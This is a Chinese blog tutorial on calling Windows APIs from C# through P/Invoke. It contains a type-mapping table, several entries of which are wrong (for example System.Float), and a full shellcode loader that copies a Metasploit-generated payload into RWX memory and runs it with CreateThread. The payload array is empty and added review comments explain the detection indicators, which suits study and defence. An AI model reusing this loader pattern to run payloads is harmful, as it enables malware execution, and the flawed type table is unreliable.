c# 调用Windows API - nice_0e3
2022-9-6 14:8:0 Author: www.cnblogs.com (查看原文)

前言

看点代码安抚浮躁的心

对应表（注：下表主要按 32 位进程给出。指针以及指针长度的类型（LPVOID、PVOID、SIZE_T、各类 HANDLE 等）在 64 位进程中应映射为 System.IntPtr / System.UIntPtr，否则地址会被截断；另外 .NET 中并没有 System.Float，FLOAT 对应的是 System.Single。）

API数据类型 Windows API时的数据类型
BOOL System.Int32
BOOLEAN System.Int32
BYTE System.UInt16
COLORREF System.UInt32
DWORD System.UInt32
DWORD32 System.UInt32
DWORD64 System.UInt64
FLOAT System.Float
HACCEL System.IntPtr
HANDLE System.IntPtr
HBITMAP System.IntPtr
HBRUSH System.IntPtr
HCONV System.IntPtr
HCONVLIST System.IntPtr
HCURSOR System.IntPtr
HDC System.IntPtr
HDDEDATA System.IntPtr
HDESK System.IntPtr
HDROP System.IntPtr
HDWP System.IntPtr
HENHMETAFILE System.IntPtr
HFILE System.IntPtr
HFONT System.IntPtr
HGDIOBJ System.IntPtr
HGLOBAL System.IntPtr
HHOOK System.IntPtr
HICON System.IntPtr
HIMAGELIST System.IntPtr
HIMC System.IntPtr
HINSTANCE System.IntPtr
HKEY System.IntPtr
HLOCAL System.IntPtr
HMENU System.IntPtr
HMETAFILE System.IntPtr
HMODULE System.IntPtr
HMONITOR System.IntPtr
HPALETTE System.IntPtr
HPEN System.IntPtr
HRGN System.IntPtr
HRSRC System.IntPtr
HSZ System.IntPtr
HWINSTA System.IntPtr
HWND System.IntPtr
INT System.Int32
INT32 System.Int32
INT64 System.Int64
LONG System.Int32
LONG32 System.Int32
LONG64 System.Int64
LONGLONG System.Int64
LPARAM System.IntPtr
LPBOOL System.Int16[]
LPBYTE System.UInt16[]
LPCOLORREF System.UInt32[]
LPCSTR System.String
LPCTSTR System.String
LPCVOID System.UInt32
LPCWSTR System.String
LPDWORD System.UInt32[]
LPHANDLE System.UInt32
LPINT System.Int32[]
LPLONG System.Int32[]
LPSTR System.String
LPTSTR System.String
LPVOID System.UInt32
LPWORD System.Int32[]
LPWSTR System.String
LRESULT System.IntPtr
PBOOL System.Int16[]
PBOOLEAN System.Int16[]
PBYTE System.UInt16[]
PCHAR System.Char[]
PCSTR System.String
PCTSTR System.String
PCWCH System.UInt32
PCWSTR System.UInt32
PDWORD System.Int32[]
PFLOAT System.Float[]
PHANDLE System.UInt32
PHKEY System.UInt32
PINT System.Int32[]
PLCID System.UInt32
PLONG System.Int32[]
PLUID System.UInt32
PSHORT System.Int16[]
PSTR System.String
PTBYTE System.Char[]
PTCHAR System.Char[]
PTSTR System.String
PUCHAR System.Char[]
PUINT System.UInt32[]
PULONG System.UInt32[]
PUSHORT System.UInt16[]
PVOID System.UInt32
PWCHAR System.Char[]
PWORD System.Int16[]
PWSTR System.String
REGSAM System.UInt32
SC_HANDLE System.IntPtr
SC_LOCK System.IntPtr
SHORT System.Int16
SIZE_T System.UInt32
SSIZE_ System.UInt32
TBYTE System.Char
TCHAR System.Char
UCHAR System.Byte
UINT System.UInt32
UINT32 System.UInt32
UINT64 System.UInt64
ULONG System.UInt32
ULONG32 System.UInt32
ULONG64 System.UInt64
ULONGLONG System.UInt64
USHORT System.UInt16
WORD System.UInt16
WPARAM System.IntPtr
LPTHREAD_START_ROUTINE UInt32
LPSECURITY_ATTRIBUTES LPSECURITY_ATTRIBUTES

案例1

/// <summary>
/// P/Invoke declaration of kernel32!VirtualAlloc. Every parameter and the
/// return value are declared as 32-bit integers; lpAddress and the returned
/// base address are pointer-sized natively, so this signature only matches
/// a 32-bit process (in a 64-bit process the address would be truncated).
/// </summary>
/// <param name="lpAddress">Requested base address, or 0 to let the system choose.</param>
/// <param name="dwSize">Size of the region in bytes.</param>
/// <param name="flAllocationType">MEM_* allocation flags.</param>
/// <param name="flProtect">PAGE_* protection flags for the region.</param>
/// <returns>Base address of the allocated region, or 0 on failure.</returns>
[DllImport("kernel32", EntryPoint = "VirtualAlloc")] // import the VirtualAlloc function from kernel32.dll
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);// declare the Win32 API function

...
// call site: commit a region sized to the payload with magic-number flags
// (0x00001000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE, i.e. RWX pages).
// `shellcode` is not defined in this snippet and the return value is not
// checked (VirtualAlloc returns 0 on failure).
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

// or, written with named constants instead of magic numbers
// (the values are the Win32 MEM_COMMIT and PAGE_EXECUTE_READWRITE flags;
// they are mutable static fields here, `const` would be the idiomatic form)

  private static UInt32 MEM_COMMIT = 0x1000;
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修饰符用于声明在外部实现的方法。 extern 修饰符的常见用法是在使用 Interop 服务调入非托管代码时与 DllImport 特性一起使用。在这种情况下,还必须将方法声明为 static

完整代码

    /// <summary>
    /// Entry point of the sample: commits a writable-and-executable region,
    /// copies the <c>shellcode</c> byte array into it, starts a thread at that
    /// address and blocks until the thread exits. No Win32 return value is
    /// checked anywhere in the method.
    /// </summary>
    /// <param name="args">Command-line arguments; unused.</param>
    static void Main(string[] args)
        {
            // native function’s compiled code
            // generated with metasploit
            // NOTE(review): `new byte[892] { }` does not compile as written — an
            // explicit length with an empty initializer is error CS0847;
            // presumably the payload bytes were stripped from the listing.
            byte[] shellcode = new byte[892] {  };
           
            
            
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            // MEM_COMMIT + PAGE_EXECUTE_READWRITE: a private region that is
            // writable *and* executable at the same time. An RWX allocation
            // followed by a thread started inside it is exactly the in-memory
            // code-execution pattern that AV/EDR memory scanners and behavioural
            // rules key on. VirtualAlloc returns 0 on failure and that is not
            // checked; Marshal.Copy would then write to address 0.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            // funcAddr is a 32-bit integer cast back to IntPtr: this only works
            // in a 32-bit process, a 64-bit address was already truncated by the
            // UInt32 return type of the VirtualAlloc declaration.
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            // CreateThread returns IntPtr.Zero on failure; not checked either.
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            // 0xFFFFFFFF == INFINITE: wait until the thread finishes. hThread is
            // never passed to CloseHandle and the region is never VirtualFree'd,
            // so both leak until process exit (both functions are declared below
            // but unused).
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        // Win32 constants used by VirtualAlloc in Main: MEM_COMMIT (0x1000) commits
        // pages, PAGE_EXECUTE_READWRITE (0x40) makes them RWX. Declared as mutable
        // static fields rather than `const`, so nothing prevents later code from
        // reassigning them.
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        /// <summary>
        /// kernel32!VirtualAlloc. The base address and the return value are
        /// declared as <see cref="UInt32"/>; both are pointer-sized natively, so
        /// this signature is only correct in a 32-bit process. Widening the
        /// return type to IntPtr would change every caller (Main stores it in a
        /// UInt32), so it is only flagged here.
        /// </summary>
        /// <param name="lpStartAddr">Requested base address, 0 to let the system choose.</param>
        /// <param name="size">Region size in bytes.</param>
        /// <param name="flAllocationType">MEM_* allocation flags.</param>
        /// <param name="flProtect">PAGE_* protection flags.</param>
        /// <returns>Base address of the region, or 0 on failure.</returns>
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        /// <summary>
        /// kernel32!VirtualFree. Declared but never called in this listing, so
        /// the region committed in Main is never released.
        /// </summary>
        /// <param name="lpAddress">Base address of the region to release/decommit.</param>
        /// <param name="dwSize">Size in bytes (0 when releasing a whole region).</param>
        /// <param name="dwFreeType">MEM_RELEASE or MEM_DECOMMIT.</param>
        /// <returns>true on success, false on failure.</returns>
        [DllImport("kernel32")] 
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        /// <summary>
        /// kernel32!CreateThread. <paramref name="lpThreadAttributes"/> (natively
        /// an LPSECURITY_ATTRIBUTES pointer) and <paramref name="lpStartAddress"/>
        /// (natively a function pointer) are declared as <see cref="UInt32"/>,
        /// so this declaration is 32-bit-process only. A new thread whose start
        /// address lies in a freshly committed private RWX region is a strong
        /// indicator that endpoint detection tooling looks for.
        /// </summary>
        /// <param name="lpThreadAttributes">Security attributes pointer; 0 for defaults.</param>
        /// <param name="dwStackSize">Initial stack size; 0 for the default.</param>
        /// <param name="lpStartAddress">Address the new thread starts executing at.</param>
        /// <param name="param">Argument passed to the thread routine.</param>
        /// <param name="dwCreationFlags">Creation flags (0 = run immediately).</param>
        /// <param name="lpThreadId">Receives the new thread's id.</param>
        /// <returns>Thread handle, or IntPtr.Zero on failure. Caller owns the handle.</returns>
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );
        /// <summary>
        /// kernel32!CloseHandle. Declared but never called in this listing; the
        /// thread handle returned by CreateThread in Main is leaked.
        /// </summary>
        /// <param name="handle">Handle to close.</param>
        /// <returns>true on success, false on failure.</returns>
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        /// <summary>
        /// kernel32!WaitForSingleObject. Main passes 0xFFFFFFFF (INFINITE) and
        /// ignores the WAIT_* status that is returned.
        /// </summary>
        /// <param name="hHandle">Handle to wait on.</param>
        /// <param name="dwMilliseconds">Timeout in ms; 0xFFFFFFFF waits forever.</param>
        /// <returns>WAIT_OBJECT_0, WAIT_TIMEOUT, WAIT_ABANDONED or WAIT_FAILED.</returns>
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );
        /// <summary>
        /// kernel32!GetModuleHandle. With the default DllImport CharSet (Ansi)
        /// the runtime binds to GetModuleHandleA. Declared but unused in this
        /// listing.
        /// </summary>
        /// <param name="moduleName">Module name, or null for the calling process's executable.</param>
        /// <returns>Module handle, or IntPtr.Zero if the module is not loaded.</returns>
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        /// <summary>
        /// kernel32!GetProcAddress. The native return type is a function pointer
        /// (FARPROC) but it is declared as <see cref="UInt32"/>, so the result is
        /// truncated in a 64-bit process; IntPtr would be the correct type.
        /// Declared but unused in this listing.
        /// </summary>
        /// <param name="hModule">Module handle to look the export up in.</param>
        /// <param name="procName">Exported function name (always ANSI for this API).</param>
        /// <returns>Address of the export, or 0 if not found.</returns>
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        /// <summary>
        /// kernel32!LoadLibrary (binds to LoadLibraryA under the default Ansi
        /// CharSet). The native return type is an HMODULE, declared here as
        /// <see cref="UInt32"/>, which truncates in a 64-bit process; IntPtr
        /// would be the correct type. Declared but unused in this listing.
        /// </summary>
        /// <param name="lpFileName">Path or name of the module to load.</param>
        /// <returns>Module handle, or 0 on failure.</returns>
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        /// <summary>
        /// kernel32!GetLastError. P/Invoking this directly is unreliable: the
        /// runtime may itself call Win32 APIs between the failing call and this
        /// one and overwrite the error code. The supported pattern is
        /// <c>[DllImport(..., SetLastError = true)]</c> on the declaration that
        /// can fail plus <c>Marshal.GetLastWin32Error()</c>. Declared but unused
        /// in this listing.
        /// </summary>
        /// <returns>The calling thread's last-error code.</returns>
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
  }

}

文章来源: https://www.cnblogs.com/nice0e3/p/16661576.html